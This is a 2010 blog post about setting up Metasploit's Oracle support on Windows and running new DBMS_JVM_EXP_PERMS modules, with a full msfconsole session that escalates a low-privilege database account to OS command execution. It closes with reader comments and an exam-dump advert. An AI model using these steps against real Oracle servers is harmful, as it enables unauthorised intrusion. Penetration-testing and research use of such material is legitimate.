Metasploit Oracle Windows

March 15, 2010

I finally managed to get Oracle and Metasploit working (only in windows though). Here are the steps that i followed (thanks to bugtrace):
[1]Install subversion client

[2]install ruby

[3]install ruby-oci8
ruby ruby-oci8-1.0.7-mswin32.rb

svn co metasploit

cd metasploit
ruby msfconsole

As i was very pleased to see the oracle exploits in action in Metasploit, i have also added 2 new exploits from David Litchfield’s blackhat talk (DBMS_JVM_EXP_PERMS exploit). The exploits let you execute OS Code against 10g R2, 11g R1 and 11g R2 if you have a valid user account (just create session privileged required). Please do a svn update to get the following new files:


Here is how it works:

C:metasploit>svn update

A modulesauxiliarysqlioraclejvm_os_code_10g.rb
A modulesauxiliarysqlioraclejvm_os_code_11g.rb

U modulesauxiliaryscannernfsnfsmount.rb
A modulesauxiliaryscannersmbsmb_enumshares.rb
U modulesauxiliarygatherdns_enum.rb
U modulesexploitsunixwebappphpbb_highlight.rb
U datawordlistsnamelist.txt
A datasqlmigrate14_add_loots_fields.rb

msf auxiliary(jvm_os_code_10g) > use auxiliary/sqli/oracle/jvm_os_code_10g
msf auxiliary(jvm_os_code_10g) > info

Name: DBMS_JVM_EXP_PERMS 10gR2, 11gR1/R2 OS Command Execution
Version: 8822
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:

Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
CMD echo metasploit >> %SYSTEMDRIVE%unbreakable.txt no CMD to execute.
DBPASS test yes The password to authenticate with.
DBUSER test yes The username to authenticate with.
RHOST yes The Oracle host.
RPORT 1521 yes The TNS port.
SID ORCLX yes The sid to authenticate with.

This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package
that allows any user with create session privilege to grant
themselves java IO privileges. Identified by David Litchfield. Works
on 10g R2, 11g R1 and R2 (Windows only)


msf auxiliary(jvm_os_code_10g) > set RHOST
msf auxiliary(jvm_os_code_10g) > set RPORT 1521
RPORT => 1521
msf auxiliary(jvm_os_code_10g) > set DBUSER test
DBUSER => test
msf auxiliary(jvm_os_code_10g) > set DBPASS test
DBPASS => test
msf auxiliary(jvm_os_code_10g) > set SID ORCLX
msf auxiliary(jvm_os_code_10g) > run

[*] Attempting to grant JAVA IO Privileges
[*] Attempting to execute OS Code
[*] Auxiliary module execution completed
msf auxiliary(jvm_os_code_10g) >

Advert: We offer the best quality 70-271 study material and 1z0-050 dumps to help you pass 1z0-051 exams on time.



  • sumit says:

    Getting following error any idea what i could have missd
    msf auxiliary(jvm_os_code_10g) > run

    [*] Attempting to grant JAVA IO Privileges
    [*] Error: NameError uninitialized constant OCIError
    [*] Auxiliary module execution completed

  • sumit says:

    its working i missed to install ruby-oci8-1.0.7-mswin32.rb

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.